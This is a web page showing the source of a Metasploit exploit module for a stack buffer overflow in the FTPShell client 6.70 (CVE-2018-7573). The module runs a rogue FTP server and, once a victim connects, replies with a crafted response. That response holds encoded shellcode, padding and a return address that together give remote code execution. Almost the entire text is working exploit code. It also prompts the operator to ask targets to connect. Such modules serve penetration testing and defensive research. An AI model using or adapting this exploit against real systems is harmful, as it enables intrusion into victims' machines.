CoCalc -- ftpshell_cli

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
¹⁹⁵⁶⁶ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::TcpServer
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
16
        'Description' => %q{
17
          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise
18
          edition) allowing remote code execution.
19
        },
20
        'Author' => [
21
          'r4wd3r', # Original exploit author
22
          'Daniel Teixeira' # MSF module author
23
        ],
24
        'License' => MSF_LICENSE,
25
        'References' => [
26
          [ 'CVE', '2018-7573'],
27
          [ 'EDB', '44596' ]
28
        ],
29
        'Payload' => {
30
          'Space' => 400,
31
          'BadChars' => "\x00\x22\x0d\x0a\x0b"
32
        },
33
        'Platform' => 'win',
34
        'Targets' => [
35
          # CALL ESI in FTPShell.exe : 0x00452eed
36
          [ 'Windows Universal', { 'Ret' => "\xed\x2e\x45" } ]
37
        ],
38
        'Privileged' => false,
39
        'DefaultOptions' => {
40
          'SRVHOST' => '0.0.0.0',
41
          'EXITFUNC' => 'thread'
42
        },
43
        'DisclosureDate' => '2017-03-04',
44
        'DefaultTarget' => 0,
45
        'Notes' => {
46
          'Reliability' => UNKNOWN_RELIABILITY,
47
          'Stability' => UNKNOWN_STABILITY,
48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
        }
50
      )
51
    )
52

53
    register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
54
  end
55

56
  def exploit
57
    srv_ip_for_client = datastore['SRVHOST']
58
    if srv_ip_for_client == '0.0.0.0'
59
      if datastore['LHOST']
60
        srv_ip_for_client = datastore['LHOST']
61
      else
62
        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
63
      end
64
    end
65

66
    srv_port = datastore['SRVPORT']
67

68
    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
69
    super
70
  end
71

72
  def on_client_connect(client)
73
    p = regenerate_payload(client)
74
    return if p.nil?
75

76
    print_status("#{client.peerhost} - connected.")
77

78
    res = client.get_once.to_s.strip
79
    print_status("#{client.peerhost} - Request: #{res}") unless res.empty?
80
    print_status("#{client.peerhost} - Response: Sending 220 Welcome")
81
    welcome = "220 Welcome.\r\n"
82
    client.put(welcome)
83

84
    res = client.get_once.to_s.strip
85
    print_status("#{client.peerhost} - Request: #{res}")
86
    print_status("#{client.peerhost} - Response: sending 331 OK")
87
    user = "331 OK.\r\n"
88
    client.put(user)
89

90
    res = client.get_once.to_s.strip
91
    print_status("#{client.peerhost} - Request: #{res}")
92
    print_status("#{client.peerhost} - Response: Sending 230 OK")
93
    pass = "230 OK.\r\n"
94
    client.put(pass)
95
    res = client.get_once.to_s.strip
96
    print_status("#{client.peerhost} - Request: #{res}")
97

98
    sploit = '220 "'
99
    sploit << payload.encoded
100
    sploit << "\x20" * (payload_space - payload.encoded.length)
101
    sploit << target.ret
102
    sploit << "\" is current directory\r\n"
103

104
    print_status("#{client.peerhost} - Request: Sending the malicious response")
105
    client.put(sploit)
106
  end
107
end
108

109
Product

Resources

Company
